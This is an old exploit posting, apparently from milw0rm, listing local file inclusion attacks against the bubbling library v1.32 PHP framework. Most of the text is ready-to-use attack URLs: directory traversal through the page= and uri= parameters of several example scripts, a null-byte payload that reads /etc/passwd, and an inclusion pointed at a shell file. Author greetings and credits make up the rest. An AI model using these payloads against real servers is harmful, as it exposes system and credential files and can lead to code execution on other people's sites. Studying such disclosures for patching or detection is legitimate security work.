## bubbling library v1.32 multiple Local File Inclusion Vulnerabilities ## Download scrip : http://sourceforge.net/project/showfiles.php?group_id=192730 ## Author : Stack-Terrorist [v40] ## Email : v.4@hotmail.fr ## Home : http://www.v4-team.com ## for execute exploit does not write extention of file ## Other files: =../../../../etc/passwd%00 ## exploit : # # examples/dispatcher/framework/simple.php?page=[local file]&tpl=ajax http://localhost/ [script] /examples/dispatcher/framework/simple.php?page=../[name of file wthout php] http://localhost/ [script] /examples/dispatcher/framework/yui-menu.php?page=../[name of file wthout php] http://localhost/ [script] /examples/dispatcher/framework/advanced.tpl.php?uri=../[name of file wthout php] # examples/dispatcher/framework/simple.php?page=/home/user/shell http://localhost/ [script] /examples/dispatcher/framework/yui-menu.tpl.php?uri=../[name of file wthout php] http://localhost/ [script] /examples/dispatcher/framework/simple.tpl.php?uri=../[name of file wthout php] http://localhost/ [script] /examples/dispatcher/framework/advanced.php?page=../[name of file wthout php] Greetz : H-T Team , v4 Team , Tryag , no-hack all my friend Special tnx for : Houssamix thx for: Proamk - djekmani - Jadi - Bohayra - MR.safa7 -Hack3r-b0y - str0ke # milw0rm.com [2008-01-26]